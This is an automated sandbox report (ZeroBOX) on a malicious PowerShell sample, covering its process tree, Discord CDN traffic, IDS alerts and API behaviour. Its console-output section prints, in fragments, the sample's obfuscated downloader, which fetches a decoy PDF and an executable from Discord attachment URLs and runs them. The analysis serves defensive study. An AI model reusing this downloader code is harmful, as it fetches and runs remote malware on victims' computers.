Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 10, 2023, 11:10 a.m.	March 10, 2023, 11:12 a.m.

Size	881.0B
Type	ASCII text, with very long lines, with no line terminators
MD5	`05526a1c67586ceb0c63891ca2d1a15f`
SHA256	`b6bbefba6e3c0de88fa5ba41a1297e7b0dfd76a59ea1f7410d738aa78c9b007b`
CRC32	`D9BE311B`
ssdeep	`24:XVysiWIVPwLgzQ5QWAa64lc/lXlzosl4+r:YSINJzQ0ycFFo2/`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\uucqwn.txt.ps1
3052
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ygz592.bat'"
  2104

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.130.233

IP Address	Status	Action
162.159.134.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
UDP 192.168.56.102:63709 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
TCP 192.168.56.102:49167 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49166 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49167 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49166 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49170 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49170 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49169 -> 162.159.134.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49170 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49170 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49166 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49169 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49167 -> 162.159.134.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 10, 2023, 11:10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 10, 2023, 11:10 a.m.			0	0

Command line console output was observed (50 out of 57 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: Remove-Item : Cannot remove the item at 'C:\Users\test22\AppData\Local\Temp\' b console_handle: 0x00000023	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ecause it is in use. console_handle: 0x0000002f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\uucqwn.txt.ps1:1 char:548 console_handle: 0x0000003b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + powershell -win hidden $uwqe1o=iex($('[Environment]::GetEtgft'''.Replace('tgf console_handle: 0x00000047	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ','nvironmentVariable(''public'') + ''\\ygz592.ba')));$flol=iex($('[Environment console_handle: 0x00000053	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ]::GetEtgft'''.Replace('tgf','nvironmentVariable(''public'') + ''\\i8h.ba')));f console_handle: 0x0000005f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: unction getit([string]$fz, [string]$oulv){$ff=iex($('(Nonbw-Objonbct Systonbm.N console_handle: 0x0000006b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: onbt.WonbbClionbnt).Downewde($oulv.Replace(''ulo'',''tps://'').Replace(''vk0'', console_handle: 0x00000077	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ''e''), $fz)').Replace('onb', 'e').Replace('ewd', 'loadFil'));iex('sthearthe $ console_handle: 0x00000083	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: fz'.Replace('the','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item <<< console_handle: 0x0000008f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: < -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($fzf + 'Exam console_handle: 0x0000009b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: s 2022.pdf') -oulv 'htulocdn.discordapp.com/attachmvk0nts/1071268301457592352/1 console_handle: 0x000000a7	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: 075814163055644672/ADEL_Cataloguvk0_1.1.2019.pdf';getit -fz $flol -oulv 'htuloc console_handle: 0x000000b3	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: dn.discordapp.com/attachmvk0nts/1071268301457592352/1080901288881045555/Quyvk0t console_handle: 0x000000bf	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: _pdf_1.vk0xvk0';exit console_handle: 0x000000cb	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Remove-Item], PSInvalidOp console_handle: 0x000000d7	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: erationException console_handle: 0x000000e3	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + FullyQualifiedErrorId : InvalidOperation,Microsoft.PowerShell.Commands.R console_handle: 0x000000ef	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: emoveItemCommand console_handle: 0x000000fb	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: At line:1 char:47 console_handle: 0x0000003b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + (New-Object System.Net.WebClient).DownloadFile <<<< ($oulv.Replace('ulo','tps console_handle: 0x00000047	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ://').Replace('vk0', 'e'), $fz) console_handle: 0x00000053	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000005f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000006b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x0000008b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: nnot find the file specified. console_handle: 0x00000097	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: At line:1 char:6 console_handle: 0x000000a3	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + start <<<< $fz console_handle: 0x000000af	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x000000bb	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: erationException console_handle: 0x000000c7	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x000000d3	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ommands.StartProcessCommand console_handle: 0x000000df	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x000000ff	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000010b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: At line:1 char:47 console_handle: 0x00000117	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + (New-Object System.Net.WebClient).DownloadFile <<<< ($oulv.Replace('ulo','tps console_handle: 0x00000123	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ://').Replace('vk0', 'e'), $fz) console_handle: 0x0000012f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000013b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000147	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x00000167	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: nnot find the file specified. console_handle: 0x00000173	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: At line:1 char:6 console_handle: 0x0000017f	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + start <<<< $fz console_handle: 0x0000018b	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x00000197	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: erationException console_handle: 0x000001a3	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x000001af	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: ommands.StartProcessCommand console_handle: 0x000001bb	1	1
WriteConsoleW March 10, 2023, 11:10 a.m.	buffer: The term '=iex' is not recognized as the name of a cmdlet, function, script fil console_handle: 0x00000023	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 61 events)

Time & API	Arguments	Status	Return
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060711e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x060712e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cf930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfbb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfbb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfbb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cf8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cf8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cf8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cf670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 10, 2023, 11:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cfdb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 10, 2023, 11:10 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 174 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05691000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06980000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
